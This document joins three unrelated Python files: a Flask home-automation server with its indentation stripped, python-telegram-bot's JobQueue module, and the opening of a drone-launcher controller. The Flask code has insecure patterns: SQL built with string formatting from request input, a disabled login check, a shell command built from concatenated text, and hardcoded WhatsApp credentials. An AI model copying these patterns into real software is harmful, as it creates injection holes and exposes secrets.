@app.route("/task_create", methods=['POST'])
def createTask():
# print("create")
# userRole = session.get('userRole')
# userCodeRole = isRoleValid(userRole)
# if session.get('logged_in') != True or userCodeRole == False:
# print("if Session")
# print(session)
# return redirect(url_for('dashboard'))
description=request.form['name']
timeTask=request.form['time-task']
action=request.form['action']
area=request.form['area-id']
global appliance_task
appliance_task=request.form.get('appliance-id', type=int)
conn = engine.connect()
query="insert into task ( name , description ,create_date,time, status,task_type_id,area_id,appliance_id) values (%s,%s,%s,%s,%s,%s,%s,%s)"
data= conn.execute(query,(action,description, time.strftime("%Y-%m-%d"),timeTask , 1,1,area,appliance_task))
#conn.commit()
conn.close()
msg = collections.OrderedDict()
if data != None:
print("creating task")
print(appliance_task)
msg['status'] = 1
msg['msg'] = "task successfully created"
time_lights_off=timeTask
if action=="task_light_off":
task_lights_off=True
th2=threading.Thread(target=daemon3) #switch off
th2.daemon = True
th2.start()
else:
task_lights_on=True
th3=threading.Thread(target=daemon2) #switch on
th3.daemon = True
th3.start()
else:
msg = collections.OrderedDict()
msg['status'] = 0
msg['msg'] = "error, task not created"
res = JSON.dumps(msg)
return res
@app.route("/task_light_off", methods=['GET'])
def task_light_off():
response="error"
task_hour= request.args.get('task_hour')
conn = engine.connect()
query="insert into task ( name , description ,create_date,time, status,task_type_id) values (%s,%s,%s,%s,%s,%s)"
data= conn.execute(query,("task_light_off","tarea apagar luz", time.strftime("%Y-%m-%d"),task_hour , 1,1))
#conn.commit()
conn.close()
if data !=None:
response="success"
task_lights_off=True
time_lights_off=task_hour
th=threading.Thread(target=daemon3)
th.daemon = True
th.start()
return response
@app.route("/arduino/temperature", methods=['GET'])
def getTemperatura():
json = collections.OrderedDict()
obj = collections.OrderedDict()
msg='success'
status=0
ser_data=""
temperatura="0"
try:
ser.write("TEMPERATURA")
time.sleep(1)
ser_data=ser.readline()
status=1
if len(ser_data) == 0 or ser_data.strip().isdigit()==False:
msg="error temp serial"
else:
temperatura=ser_data
except Exception as e:
print(e)
temperatura="0"
msg="error temperature"
json["status"] = status
json["msg"] = msg
obj['value'] = temperatura
json["temperature"] = obj
print("temp: "+temperatura)
return JSON.dumps(json)
@app.route("/arduino/humidity", methods=['GET'])
def getHumedad():
json = collections.OrderedDict()
obj = collections.OrderedDict()
msg='success'
status=0
ser.write("HUMEDAD")
humedad=""
try:
ser_data=ser.readline()
humedad=ser_data
status=1
if len(ser_data) == 0 or humedad.strip().isdigit()==False:
humedad="0"
except Exception as e:
print(e)
humedad="0"
msg="error humidity"
json["status"] = status
json["msg"] = msg
obj['value'] = humedad
json["humidity"] = obj
return JSON.dumps(json)
@app.route("/arduino/alarm_status", methods=['GET'])
def getAlarmStatus():
alarm_status="0"
conn = engine.connect()
rows=conn.execute("select status from sensor where id = 7 ")
#rows = cursor.fetchall()
conn.close()
for row in rows:
alarm_status=str(row[0])
return alarm_status
@app.route("/arduino/alarm", methods=['GET'])
def arduinoAlarm():
action = request.args.get('action')
json = collections.OrderedDict()
msg='success '+action
status=1
try:
func, args = {
'alarm_mov_on': (changeAlarmStatus,('ALARM_MOV_ON',1,7,)),
'alarm_gas_on': (changeAlarmStatus,('ALARM_GAS_ON',1,8,)),
'alarm_gas_off': (changeAlarmStatus,('ALARM_GAS_OFF',0,8,))
}.get(action, (changeAlarmStatus,('ALARM_MOV_OFF',0,7,)))
result = func(*args)
ser=serial.Serial('/dev/ttyACM0',9600,timeout=2)
except:
print "serial not connected"
msg='error'
status=0
if action=='alarm_mov_on':
daemon_alarm_actived=True
th1=threading.Thread(target=daemon)
th1.daemon = True
th1.start()
os.system('./texto_a_voz.sh '+ 'Alarma, activada')
if action=='alarm_gas_on':
daemon_alarm_actived=True
th1=threading.Thread(target=daemon)
th1.daemon = True
th1.start()
os.system('./texto_a_voz.sh '+ 'Alarma, activada')
json["status"] = status
json["msg"] = msg
return jsonify(json)
@app.route("/arduino/lock", methods=['GET'])
def arduinoLock():
action = request.args.get('action')
json = collections.OrderedDict()
msg='success '+action
status=0
try:
print(action.upper())
ser.write(str(action).strip().upper())
time.sleep(1)
ser_data=ser.readline()
if len(ser_data)>0:
status=1
except:
msg='error'
status=0
json["status"] = status
json["msg"] = msg
return jsonify(json)
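# Background watchers:
#   daemon()  - blocks on the serial port and, when the Arduino reports
#               "HAY MOVIMIENTO" (movement) or "FUGA_GAS" (gas leak), sends a
#               Telegram alert and resets the matching sensor row.
#   daemon2() - waits for a scheduled "lights on" task and sends LIGHT_ON_L1.
#   daemon3() - waits for a scheduled "lights off" task and sends LIGHT_OFF_L1.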
def daemon():
while True:
sensor_id=0
ser_data=ser.readline()
if len(ser_data) > 0:
if ser_data.strip() == "HAY MOVIMIENTO":
sendTelegramMessage("🚨 Alerta ⚠, Posible Intruso detectado❗🔓🤔😬😨",1)
sensor_id=7
if ser_data.strip() == "FUGA_GAS":
sendTelegramMessage("🚨 Alerta ⚠, Posible Fuga de Gas❗🔓🤔😬😨",2)
sensor_id=8
if sensor_id != 0:
conn = engine.connect()
conn.execute("""UPDATE sensor SET status=%s WHERE id = %s""", (0,sensor_id))
#conn.commit()
conn.close()
sensor_id=0
break
def daemon2():
print("running task lights on")
print(appliance_task)
conn = engine.connect()
query="select time from task where name=%s and appliance_id=%s and status =%s order by time desc limit 1"
rows= conn.execute(query,('task_light_on',appliance_task,1))
conn.close()
#rows = cursor.fetchall()
light_status="off"
task_lights_on=False
for row in rows:
task_lights_on=True
time_lights_on = row[0]
print("entra")
while True:
if task_lights_on:
current_time = getCurrentTime()
if light_status=="off":
print(current_time)
print(time_lights_on)
if time_lights_on[0:5]==current_time and light_status=="off":
ser.write("LIGHT_ON_L1")
time.sleep(1)
print("LIGHT_ON_L1")
conn = engine.connect()
conn.execute("""UPDATE task SET status=%s WHERE appliance_id = %s""", (0,appliance_task))
#conn.commit()
conn.close()
light_status="on"
break
def daemon3():
print("running task lights off")
conn = engine.connect()
query="select time from task where name=%s and appliance_id=%s and status=%s limit 1"
rows= conn.execute(query,('task_light_off',appliance_task,1))
conn.close()
#rows = cursor.fetchall()
light_status="on"
for row in rows:
task_lights_off=True
time_lights_off = row[0]
print(time_lights_off)
while True:
if task_lights_off:
current_time = getCurrentTime()
if light_status=="on":
print(current_time)
print(time_lights_off)
if time_lights_off[0:5]==current_time and light_status=="on":
ser.write("LIGHT_OFF_L1")
print("LIGHT_OFF_L1")
conn = engine.connect()
conn.execute("""UPDATE task SET status=%s WHERE appliance_id = %s""", (0,appliance_task))
#conn.commit()
conn.close()
light_status="off"
break
def sendWhatsappMessage(msg):
print("enviando Whatsapp")
os.system("yowsup-cli demos -l 595992871584:AKpAWiC0CE48/dMw9WUCFhaCDqY= -s 595985991956 '"+msg+"'")
def sendTelegramMessage(mensaje,alert_type):
if alert_type==1:
camera.start_preview()
time.sleep(1)
camera.capture('/home/pi/intruso.jpg')
camera.stop_preview()
subprocess.call(["./tg.sh", "Domo_home", mensaje])
else:
subprocess.call(["./tg2.sh", "Domo_home", mensaje])
def changeAlarmStatus(alarm_type,alarm_status,sensor_id):
ser.write(alarm_type)
print(alarm_type)
conn = engine.connect()
conn.execute("""UPDATE sensor SET status=%s WHERE id = %s""", (alarm_status,sensor_id))
#conn.commit()
conn.close()
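# Returns the current wall-clock time as HH:MM on a 12-hour clock. The extra
# 60*60 subtraction shifts the result back one hour, presumably to compensate
# for the host's clock or timezone offset (an assumption -- the original code
# does not document it).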
def getCurrentTime():
timenow= time.time() - 60*60
#m2=time.strftime("%I:%M")
currenttime =time.strftime("%I:%M",time.localtime(timenow))
#currenttime =time.strftime("%I:%M")
return currenttime
#if currenttime >= "10:00" and currenttime <= "13:00":
# if m2 >= "10:00" and m2 >= "12:00":
# m2 = ("""%s%s""" % (m2, " AM"))
# else:
# m2 = ("""%s%s""" % (m2, " PM"))
#else:
# m2 = ("""%s%s""" % (m2, " PM"))
##m2 = datetime.datetime.strptime(m2, '%I:%M %p')
#m2 = m2.strftime("%H:%M %p")
#m2 = m2[:-3]
#return m2
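# Voice command endpoint: the recognised phrase arrives in the "voice" form
# field and is mapped to an action -- reading the temperature aloud through
# texto_a_voz.sh, toggling the lights over serial, or starting/stopping music
# with mpg321 (the spawned player's pid is returned so the client can ask to
# stop it later).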
@app.route("/voiceCommand", methods=['POST'])
def voiceCommand():
json = collections.OrderedDict()
voz=request.form['voice']
pro=request.form['pid']
print(voz)
if voz:
music = None
ser.write("TEMPERATURA")
time.sleep(1)
ser_data=ser.readline()
status=1
if voz == "temperatura":
if len(ser_data) == 0 or ser_data.strip().isdigit()==False:
os.system('./texto_a_voz.sh '+ ' Temperatura no disponible')
else:
temperatura=ser_data
os.system('./texto_a_voz.sh Temperatura, '+str(ser_data).strip()+' grados')
#os.system('./texto_a_voz.sh grados')
if voz == "hola":
os.system('./texto_a_voz.sh Hola, que tal')
if voz == "activar alarma":
os.system('./texto_a_voz.sh Alarma, activada')
if voz == "quien sos":
os.system('./texto_a_voz.sh Hola, soy el sistema domótico!')
if voz == "musica":
os.system('./texto_a_voz.sh Que empiece la fiesta!')
music = Popen('mpg321 /usr/local/domotica/domotica_web_client/happy.mp3', stdout=subprocess.PIPE,
shell=True, preexec_fn=os.setsid)
pro = music.pid
#music = os.popen('mpg321 /usr/local/domotica/domotica_web_client/happy.mp3', 'w')
if voz == "parar musica":
os.killpg(os.getpgid(int(pro)), signal.SIGTERM)
if voz == "luces":
ser.write("LIGHT_ON_L1")
time.sleep(2)
ser.write("LIGHT_ON_L2")
time.sleep(1)
if voz == "apagar luces":
ser.write("LIGHT_OFF_L1")
time.sleep(2)
ser.write("LIGHT_OFF_L2")
time.sleep(1)
json["status"] = 1
json["pid"] = pro
json["msg"] = "ok"
return JSON.dumps(json)
@app.route("/task_list")
def task_list():
userRole = session.get('userRole')
validRole = isRoleValid(userRole)
conn = engine.connect()
query = "select t.id, t.name, t.description, t.create_date, t.time, t.status, t.task_type_id, a.name, app.name from task t inner join area a on t.area_id = a.id inner join appliance app on t.appliance_id = app.id"
#"select t.id, t.name, t.description, t.create_date, t.time, t.status, t.task_type_id, a.name, app.name from task t inner join area a on t.area_id = a.id inner join appliance app on t.appliance_id = app.id;"
rows=conn.execute(query)
conn.close()
#rows = cursor.fetchall()
task_list = []
for row in rows:
d = collections.OrderedDict()
d['id'] = row[0]
# d['name'] = row[1]
d['description'] = row[2]
d['creationDate'] = str(row[3])
d['time'] = str(row[4])
d['status'] = row[5]
d['area'] = row[7]
d['appliance'] = row[8]
d['validRole'] = validRole
task_list.append(d)
#cursor.close()
if rows != None:
return JSON.dumps(task_list)
# else:
# msg = collections.OrderedDict()
# msg['status'] = 0
# msg['msg'] = "Error, no se pudo obtener la lista de tareas"
# return JSON.dumps(msg)
@app.route("/task_edit", methods=['POST'])
def task_edit():
userRole = session.get('userRole')
userCodeRole = isRoleValid(userRole)
if session.get('logged_in') != True or userCodeRole == False:
print("if Session")
print(session)
return redirect(url_for('dashboard'))
id=request.form['id']
status=request.form['status']
print(id)
conn = engine.connect()
data = conn.execute("""UPDATE task SET status=%s WHERE id=%s""", (status, id))
#conn.commit()
conn.close()
print(data)
msg = collections.OrderedDict()
if data != None:
msg['status'] = 1
msg['msg'] = "Se cambió correctamente el estado de la tarea."
else:
msg = collections.OrderedDict()
msg['status'] = 0
msg['msg'] = "No se pudo cambiar el estado de la tarea."
res = JSON.dumps(msg)
return res
@app.route("/get_active_appliances_by_areaid")
def getActiveAppliancesByAreaId():
areaId = request.args.get('areaId')
conn = engine.connect()
queryAppliance="select * from appliance where status = '{activo}' and area_id = '{areaId}'".format(activo=1,areaId=areaId)
appliance_list = []
appliance_rows=conn.execute(queryAppliance)
#appliance_rows=cursor.fetchall()
for row in appliance_rows:
appliance = collections.OrderedDict()
appliance['id'] = row[0]
appliance['name'] = row[1]
# appliance['power'] = row[2]
# appliance['description'] = str(row[3])
# appliance['fee'] = row[4 ]
# appliance['status'] = row[5]
appliance_list.append(appliance)
conn.close()
print(appliance_list)
if len(appliance_list) > 0 and appliance_list != None:
return JSON.dumps(appliance_list)
else:
print("error")
def getSerialData():
try:
if ser.is_open == 0:
ser.open()
incoming = ser.readline()
ser.close()
return incoming
except serial.serialutil.SerialException:
print("No serial data this time")
ser.close()
return ''
def getSerialConnection():
while (ser.inWaiting()>0):
try:
incoming = ser.readline()
return incoming
except serial.serialutil.SerialException:
print("No data this time")
return ''
if __name__ == "__main__":
app.run(host='0.0.0.0',threaded=True)
|
jobqueue.py
|
#!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2017
# Leandro Toledo de Souza <devs@python-telegram-bot.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
"""This module contains the classes JobQueue and Job."""
import logging
import time
import warnings
import datetime
import weakref
from numbers import Number
from threading import Thread, Lock, Event
from queue import PriorityQueue, Empty
class Days(object):
MON, TUE, WED, THU, FRI, SAT, SUN = range(7)
EVERY_DAY = tuple(range(7))
class JobQueue(object):
"""This class allows you to periodically perform tasks with the bot.
Attributes:
        queue (PriorityQueue): The queue that holds the scheduled jobs.
        bot (telegram.Bot): The bot instance that is passed to the job callbacks.
Args:
bot (telegram.Bot): The bot instance that should be passed to the jobs
Deprecated: 5.2
prevent_autostart (Optional[bool]): Thread does not start during initialisation.
Use `start` method instead.
"""
def __init__(self, bot, prevent_autostart=None):
if prevent_autostart is not None:
warnings.warn("prevent_autostart is being deprecated, use `start` method instead.")
self.queue = PriorityQueue()
self.bot = bot
self.logger = logging.getLogger(self.__class__.__name__)
self.__start_lock = Lock()
self.__next_peek_lock = Lock() # to protect self._next_peek & self.__tick
self.__tick = Event()
self.__thread = None
""":type: Thread"""
self._next_peek = None
""":type: float"""
self._running = False
def put(self, job, next_t=None):
"""Queue a new job.
Args:
job (telegram.ext.Job): The ``Job`` instance representing the new job
next_t (Optional[int, float, datetime.timedelta, datetime.datetime, datetime.time]):
Time in or at which the job should run for the first time. This parameter will be
interpreted depending on its type.
``int`` or ``float`` will be interpreted as "seconds from now" in which the job
should run.
``datetime.timedelta`` will be interpreted as "time from now" in which the job
should run.
``datetime.datetime`` will be interpreted as a specific date and time at which the
job should run.
``datetime.time`` will be interpreted as a specific time at which the job should
run. This could be either today or, if the time has already passed, tomorrow.
"""
warnings.warn("'JobQueue.put' is being deprecated, use 'JobQueue.run_once', "
"'JobQueue.run_daily' or 'JobQueue.run_repeating' instead")
if job.job_queue is None:
job.job_queue = self
self._put(job, next_t=next_t)
def _put(self, job, next_t=None, last_t=None):
"""Queue a new job.
Args:
job (telegram.ext.Job): The ``Job`` instance representing the new job
next_t (Optional[int, float, datetime.timedelta, datetime.datetime, datetime.time]):
Time in or at which the job should run for the first time. This parameter will be
interpreted depending on its type.
* ``int`` or ``float`` will be interpreted as "seconds from now" in which the job
should run.
* ``datetime.timedelta`` will be interpreted as "time from now" in which the job
should run.
* ``datetime.datetime`` will be interpreted as a specific date and time at which
the job should run.
* ``datetime.time`` will be interpreted as a specific time of day at which the job
should run. This could be either today or, if the time has already passed,
tomorrow.
last_t (Optional[float]): Timestamp of the time when ``job`` was scheduled for in the
last ``put`` call. If provided, it will be used to calculate the next timestamp
more accurately by accounting for the execution time of the job (and possibly
others). If None, `now` will be assumed.
"""
if next_t is None:
next_t = job.interval
if next_t is None:
raise ValueError('next_t is None')
if isinstance(next_t, datetime.datetime):
next_t = (next_t - datetime.datetime.now()).total_seconds()
elif isinstance(next_t, datetime.time):
next_datetime = datetime.datetime.combine(datetime.date.today(), next_t)
if datetime.datetime.now().time() > next_t:
next_datetime += datetime.timedelta(days=1)
next_t = (next_datetime - datetime.datetime.now()).total_seconds()
elif isinstance(next_t, datetime.timedelta):
next_t = next_t.total_seconds()
next_t += last_t or time.time()
self.logger.debug('Putting job %s with t=%f', job.name, next_t)
self.queue.put((next_t, job))
# Wake up the loop if this job should be executed next
self._set_next_peek(next_t)
def run_once(self, callback, when, context=None, name=None):
"""Creates a new ``Job`` that runs once and adds it to the queue.
Args:
callback (function): The callback function that should be executed by the new job. It
should take two parameters ``bot`` and ``job``, where ``job`` is the ``Job``
                instance. It can be used to access its ``context`` or change it to a repeating
job.
when (int, float, datetime.timedelta, datetime.datetime, datetime.time):
Time in or at which the job should run. This parameter will be interpreted
depending on its type.
* ``int`` or ``float`` will be interpreted as "seconds from now" in which the job
should run.
* ``datetime.timedelta`` will be interpreted as "time from now" in which the job
should run.
* ``datetime.datetime`` will be interpreted as a specific date and time at which
the job should run.
* ``datetime.time`` will be interpreted as a specific time of day at which the job
should run. This could be either today or, if the time has already passed,
tomorrow.
context (Optional[object]): Additional data needed for the callback function. Can be
accessed through ``job.context`` in the callback. Defaults to ``None``
name (Optional[str]): The name of the new job. Defaults to ``callback.__name__``
Returns:
telegram.ext.jobqueue.Job: The new ``Job`` instance that has been added to the
job queue.
"""
job = Job(callback, repeat=False, context=context, name=name, job_queue=self)
self._put(job, next_t=when)
return job
def run_repeating(self, callback, interval, first=None, context=None, name=None):
"""Creates a new ``Job`` that runs once and adds it to the queue.
Args:
callback (function): The callback function that should be executed by the new job. It
should take two parameters ``bot`` and ``job``, where ``job`` is the ``Job``
                instance. It can be used to access its ``context``, terminate the job or change
its interval.
interval (int, float, datetime.timedelta): The interval in which the job will run.
If it is an ``int`` or a ``float``, it will be interpreted as seconds.
first (int, float, datetime.timedelta, datetime.datetime, datetime.time):
* ``int`` or ``float`` will be interpreted as "seconds from now" in which the job
should run.
* ``datetime.timedelta`` will be interpreted as "time from now" in which the job
should run.
* ``datetime.datetime`` will be interpreted as a specific date and time at which
the job should run.
* ``datetime.time`` will be interpreted as a specific time of day at which the job
should run. This could be either today or, if the time has already passed,
tomorrow.
Defaults to ``interval``
context (Optional[object]): Additional data needed for the callback function. Can be
accessed through ``job.context`` in the callback. Defaults to ``None``
name (Optional[str]): The name of the new job. Defaults to ``callback.__name__``
Returns:
telegram.ext.jobqueue.Job: The new ``Job`` instance that has been added to the
job queue.
"""
job = Job(callback,
interval=interval,
repeat=True,
context=context,
name=name,
job_queue=self)
self._put(job, next_t=first)
return job
def run_daily(self, callback, time, days=Days.EVERY_DAY, context=None, name=None):
"""Creates a new ``Job`` that runs once and adds it to the queue.
Args:
callback (function): The callback function that should be executed by the new job. It
should take two parameters ``bot`` and ``job``, where ``job`` is the ``Job``
                instance. It can be used to access its ``context`` or terminate the job.
time (datetime.time): Time of day at which the job should run.
days (Optional[tuple[int]]): Defines on which days of the week the job should run.
Defaults to ``Days.EVERY_DAY``
context (Optional[object]): Additional data needed for the callback function. Can be
accessed through ``job.context`` in the callback. Defaults to ``None``
name (Optional[str]): The name of the new job. Defaults to ``callback.__name__``
Returns:
telegram.ext.jobqueue.Job: The new ``Job`` instance that has been added to the
job queue.
"""
job = Job(callback,
interval=datetime.timedelta(days=1),
repeat=True,
days=days,
context=context,
name=name,
job_queue=self)
self._put(job, next_t=time)
return job
def _set_next_peek(self, t):
"""
Set next peek if not defined or `t` is before next peek.
In case the next peek was set, also trigger the `self.__tick` event.
"""
with self.__next_peek_lock:
if not self._next_peek or self._next_peek > t:
self._next_peek = t
self.__tick.set()
def tick(self):
"""
Run all jobs that are due and re-enqueue them with their interval.
"""
now = time.time()
self.logger.debug('Ticking jobs with t=%f', now)
while True:
try:
t, job = self.queue.get(False)
except Empty:
break
self.logger.debug('Peeked at %s with t=%f', job.name, t)
if t > now:
# We can get here in two conditions:
# 1. At the second or later pass of the while loop, after we've already
# processed the job(s) we were supposed to at this time.
# 2. At the first iteration of the loop only if `self.put()` had triggered
# `self.__tick` because `self._next_peek` wasn't set
self.logger.debug("Next task isn't due yet. Finished!")
self.queue.put((t, job))
self._set_next_peek(t)
break
if job.removed:
self.logger.debug('Removing job %s', job.name)
continue
if job.enabled:
try:
current_week_day = datetime.datetime.now().weekday()
if any(day == current_week_day for day in job.days):
self.logger.debug('Running job %s', job.name)
job.run(self.bot)
except:
self.logger.exception('An uncaught error was raised while executing job %s',
job.name)
else:
self.logger.debug('Skipping disabled job %s', job.name)
if job.repeat and not job.removed:
self._put(job, last_t=t)
else:
self.logger.debug('Dropping non-repeating or removed job %s', job.name)
def start(self):
"""
Starts the job_queue thread.
"""
self.__start_lock.acquire()
if not self._running:
self._running = True
self.__start_lock.release()
self.__thread = Thread(target=self._main_loop, name="job_queue")
self.__thread.start()
self.logger.debug('%s thread started', self.__class__.__name__)
else:
self.__start_lock.release()
def _main_loop(self):
"""
Thread target of thread ``job_queue``. Runs in background and performs ticks on the job
queue.
"""
while self._running:
# self._next_peek may be (re)scheduled during self.tick() or self.put()
with self.__next_peek_lock:
tmout = self._next_peek - time.time() if self._next_peek else None
self._next_peek = None
self.__tick.clear()
self.__tick.wait(tmout)
# If we were woken up by self.stop(), just bail out
if not self._running:
break
self.tick()
self.logger.debug('%s thread stopped', self.__class__.__name__)
def stop(self):
"""
Stops the thread
"""
with self.__start_lock:
self._running = False
self.__tick.set()
if self.__thread is not None:
self.__thread.join()
def jobs(self):
"""Returns a tuple of all jobs that are currently in the ``JobQueue``"""
return tuple(job[1] for job in self.queue.queue if job)
class Job(object):
"""This class encapsulates a Job
Attributes:
callback (function): The function that the job executes when it's due
interval (int, float, datetime.timedelta): The interval in which the job runs
days (tuple[int]): A tuple of ``int`` values that determine on which days of the week the
job runs
repeat (bool): If the job runs periodically or only once
name (str): The name of this job
job_queue (telegram.ext.JobQueue): The ``JobQueue`` this job belongs to
enabled (bool): Boolean property that decides if this job is currently active
Args:
callback (function): The callback function that should be executed by the Job. It should
take two parameters ``bot`` and ``job``, where ``job`` is the ``Job`` instance. It
can be used to terminate the job or modify its interval.
interval (Optional[int, float, datetime.timedelta]): The interval in which the job will
execute its callback function. ``int`` and ``float`` will be interpreted as seconds.
If you don't set this value, you must set ``repeat=False`` and specify ``next_t`` when
you put the job into the job queue.
        repeat (Optional[bool]): If this job should periodically execute its callback function
(``True``) or only once (``False``). Defaults to ``True``
context (Optional[object]): Additional data needed for the callback function. Can be
accessed through ``job.context`` in the callback. Defaults to ``None``
days (Optional[tuple[int]]): Defines on which days of the week the job should run.
Defaults to ``Days.EVERY_DAY``
name (Optional[str]): The name of this job. Defaults to ``callback.__name__``
job_queue (Optional[class:`telegram.ext.JobQueue`]): The ``JobQueue`` this job belongs to.
Only optional for backward compatibility with ``JobQueue.put()``.
"""
def __init__(self,
callback,
interval=None,
repeat=True,
context=None,
days=Days.EVERY_DAY,
name=None,
job_queue=None):
self.callback = callback
self.context = context
self.name = name or callback.__name__
self._repeat = repeat
self._interval = None
self.interval = interval
self.repeat = repeat
self._days = None
self.days = days
self._job_queue = weakref.proxy(job_queue) if job_queue is not None else None
self._remove = Event()
self._enabled = Event()
self._enabled.set()
def run(self, bot):
"""Executes the callback function"""
self.callback(bot, self)
def schedule_removal(self):
"""
Schedules this job for removal from the ``JobQueue``. It will be removed without executing
its callback function again.
"""
self._remove.set()
@property
def removed(self):
return self._remove.is_set()
@property
def enabled(self):
return self._enabled.is_set()
@enabled.setter
def enabled(self, status):
if status:
self._enabled.set()
else:
self._enabled.clear()
@property
def interval(self):
return self._interval
@interval.setter
def interval(self, interval):
if interval is None and self.repeat:
raise ValueError("The 'interval' can not be 'None' when 'repeat' is set to 'True'")
if not (interval is None or isinstance(interval, (Number, datetime.timedelta))):
raise ValueError("The 'interval' must be of type 'datetime.timedelta',"
" 'int' or 'float'")
self._interval = interval
@property
def interval_seconds(self):
if isinstance(self.interval, datetime.timedelta):
return self.interval.total_seconds()
else:
return self.interval
@property
def repeat(self):
return self._repeat
@repeat.setter
def repeat(self, repeat):
if self.interval is None and repeat:
raise ValueError("'repeat' can not be set to 'True' when no 'interval' is set")
self._repeat = repeat
@property
def days(self):
return self._days
@days.setter
def days(self, days):
if not isinstance(days, tuple):
raise ValueError("The 'days' argument should be of type 'tuple'")
if not all(isinstance(day, int) for day in days):
raise ValueError("The elements of the 'days' argument should be of type 'int'")
if not all(0 <= day <= 6 for day in days):
raise ValueError("The elements of the 'days' argument should be from 0 up to and "
"including 6")
self._days = days
@property
def job_queue(self):
""" :rtype: JobQueue """
return self._job_queue
@job_queue.setter
def job_queue(self, job_queue):
# Property setter for backward compatibility with JobQueue.put()
if not self._job_queue:
self._job_queue = weakref.proxy(job_queue)
else:
raise RuntimeError("The 'job_queue' attribute can only be set once.")
def __lt__(self, other):
return False
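
# --- Illustrative usage sketch (not part of the library) ---------------------
# A minimal, hedged example of how this JobQueue could be exercised on its own.
# It assumes that passing ``bot=None`` is acceptable for a quick local test:
# the queue never touches the bot object, it only forwards it to the callbacks.
if __name__ == '__main__':
    def heartbeat(bot, job):
        # ``bot`` is whatever was handed to JobQueue(); ``job.context`` is optional user data.
        print('heartbeat at', time.time(), 'context:', job.context)

    demo_queue = JobQueue(bot=None)
    demo_queue.start()
    demo_queue.run_repeating(heartbeat, interval=1.0, first=0, context='demo')
    demo_queue.run_once(lambda bot, job: print('one-off job fired'), when=2.5)
    time.sleep(5)
    demo_queue.stop()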
|
DLQ.py
|
#DRONE LAUNCHER
from flask import Flask, render_template, request, jsonify
from roboclaw import Roboclaw
import time
import socket
try:
from neopixel import *
except ImportError:
print("Failure to load Neoplixels")
import argparse
##import threading
try:
import thermo
except IndexError:
print("Failure to find DS18B20")
try:
import MPU9250
except OSError:
print("Remote I/O Error - MPU 92/65")
import RPi.GPIO as GPIO
from time import sleep
from threading import Thread, Event
# LED strip configuration:
LED_COUNT = 60 # Number of LED pixels.
LED_PIN = 18 # GPIO pin connected to the pixels (18 uses PWM!).
#LED_PIN = 10 # GPIO pin connected to the pixels (10 uses SPI /dev/spidev0.0).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 10 # DMA channel to use for generating signal (try 10)
LED_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest
LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)
LED_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53
# Create NeoPixel object with appropriate configuration.
try:
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL)
except NameError:
print("'Adafruit_Neopixel not defined - strip failed to set up'")
#Setup for the pins for threading the lights and the sound
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(23, GPIO.OUT, initial = GPIO.LOW) #Sound
GPIO.setup(24, GPIO.OUT, initial = GPIO.LOW) #Lights
# Define functions which animate LEDs in various ways.
def colorWipe(strip, color, wait_ms=50):
"""Wipe color across display a pixel at a time."""
for i in range(strip.numPixels()):
strip.setPixelColor(i, color)
strip.show()
#time.sleep(wait_ms/1000.0) #This sleep in case we want to have a longer intervall between each led lighting
#Function to thread the lights and the sound while the motor is moving
def relay_activate():
while True:
event.wait()
while event.is_set():
GPIO.output(24, GPIO.HIGH)
GPIO.output(23, GPIO.HIGH)
sleep(1)
GPIO.output(24, GPIO.LOW)
GPIO.output(23, GPIO.LOW)
try:
colorWipe(strip, Color(0, 255, 0))
except NameError:
print("Unable to set strip to red")
sleep(1)
try:
colorWipe(strip, Color(255, 255, 255))
except NameError:
print("Unable to set strip to white")
#Open serial port
#Linux comport name
rc = Roboclaw("/dev/ttyACM0",115200)
#Windows comport name
# rc = Roboclaw("COM8",115200)
"""Here it would be good to have LEDs switch on to confirm connection to each roboclaw"""
rc.Open()
#Declare variables
#Specify IP address and port for the server
host=(([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")] or [[(s.connect(("8.8.8.8", 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) + ["no IP found"])[0]
port=5000
address = 0x80 #Controller 1, M1=Pitch, M2=Rotation
address_2 = 0x81 #Controller 2, M1=Lift, M2=Launch
address_3 = 0x82 #Controller 3, M1=Case Open, M2=Case Close
pitch_pulses=355000 #Encoder pulses from the linear actuator
pitch_length=90.0 #Degrees 0 -> 90 degrees (0 vertical, 90 horizontal)
pitch_speed_pulses=7000 #Pulses per second
pitch_speed_manual=127 #From 0 to 127
pitch_ready=65.0 #Pitch degrees for the launch (temporary) 0 is 90 -> 65 is 25
rotation_pulses=950000 #Encoder pulses from the rotation motor
rotation_length=180.0 #Degrees
rotation_speed_pulses=16000 #Pulses per second
rotation_speed_manual=15 #From 0 to 127 - TEST BEFORE INCREASING SPEED -> 15 IS REASONABLE -> POTENTIAL RUNAWAY SPEED IF INCREASED
rotation_ready=5.0 #Rotation degrees for the launch (temporary)
lift_pulses=19000 #Encoder pulses from the lifting column
lift_length=130.0 #cm
lift_speed_pulses=420 #Pulses per second
lift_speed_manual=127 #From 0 to 127
##lift_ready=lift_length #Lift length for the launch (temporary)
lift_ready = 20.0 #INDOOR testing extension. Comment out this line and use above line if outside.
launch_pulses=14098 #Encoder pulses from the launch motor - 106 cm
launch_length=106.0 #cm
launch_speed_pulses=6*13400 #Pulses per second during launch (145000 max) (13400 pulses/m)
launch_speed_pulses_slow=2500 #Pulses per second during preparation
launch_speed_manual=15 #From 0 to 127
launch_acceleration=(launch_speed_pulses**2)/13400 #Acceleration during launch (pulses/second2)
launch_max_speed=10 #Maximum launch speed
launch_min_speed=1 #Minimum launch speed
launch_max_acceleration=48 #Maximum launch acceleration
